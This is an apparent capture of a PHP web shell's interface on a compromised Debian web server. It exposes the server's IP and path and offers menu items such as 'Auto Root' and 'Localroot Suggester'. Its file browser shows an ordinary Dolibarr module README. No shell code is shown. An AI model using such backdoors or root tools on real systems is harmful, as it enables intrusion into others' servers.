Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
hermes.bdcloud.fr /
custom /
testr1 /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
build
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
class
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
core
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
img
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
langs
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
lib
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
test
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
.editorconfig
438
B
-rw-r--r--
2022-06-28 12:45
COPYING
31.71
KB
-rw-r--r--
2022-06-28 12:45
ChangeLog.md
93
B
-rw-r--r--
2022-06-28 12:45
README.md
2.36
KB
-rw-r--r--
2022-06-28 12:45
modulebuilder.txt
242
B
-rw-r--r--
2022-06-28 12:45
testr1index.php
7.85
KB
-rw-r--r--
2022-06-28 12:45
Save
Rename
# TESTR1 FOR [DOLIBARR ERP CRM](https://www.dolibarr.org) ## Features Description... <!-- {imgmd} --> Other modules are available on [Dolistore.com](https://www.dolistore.com). ## Translations Translations can be define manually by editing files into directories *langs*. <!-- This module contains also a sample configuration for Transifex, under the hidden directory [.tx](.tx), so it is possible to manage translation using this service. For more informations, see the [translator's documentation](https://wiki.dolibarr.org/index.php/Translator_documentation). There is a [Transifex project](https://transifex.com/projects/p/dolibarr-module-template) for this module. --> <!-- ## Installation ### From the ZIP file and GUI interface - If you get the module in a zip file (like when downloading it from the market place [Dolistore](https://www.dolistore.com)), go into menu ```Home - Setup - Modules - Deploy external module``` and upload the zip file. Note: If this screen tell you there is no custom directory, check your setup is correct: - In your Dolibarr installation directory, edit the ```htdocs/conf/conf.php``` file and check that following lines are not commented: ```php //$dolibarr_main_url_root_alt ... //$dolibarr_main_document_root_alt ... ``` - Uncomment them if necessary (delete the leading ```//```) and assign a sensible value according to your Dolibarr installation For example : - UNIX: ```php $dolibarr_main_url_root_alt = '/custom'; $dolibarr_main_document_root_alt = '/var/www/Dolibarr/htdocs/custom'; ``` - Windows: ```php $dolibarr_main_url_root_alt = '/custom'; $dolibarr_main_document_root_alt = 'C:/My Web Sites/Dolibarr/htdocs/custom'; ``` ### From a GIT repository - Clone the repository in ```$dolibarr_main_document_root_alt/testr1``` ```sh cd ....../custom git clone git@github.com:gitlogin/testr1.git testr1 ``` ### <a name="final_steps"></a>Final steps From your browser: - Log into Dolibarr as a super-administrator - Go to "Setup" -> "Modules" - You should now be able to find and enable the module --> ## Licenses ### Main code GPLv3 or (at your option) any later version. See file COPYING for more information. ### Documentation All texts and readmes are licensed under GFDL.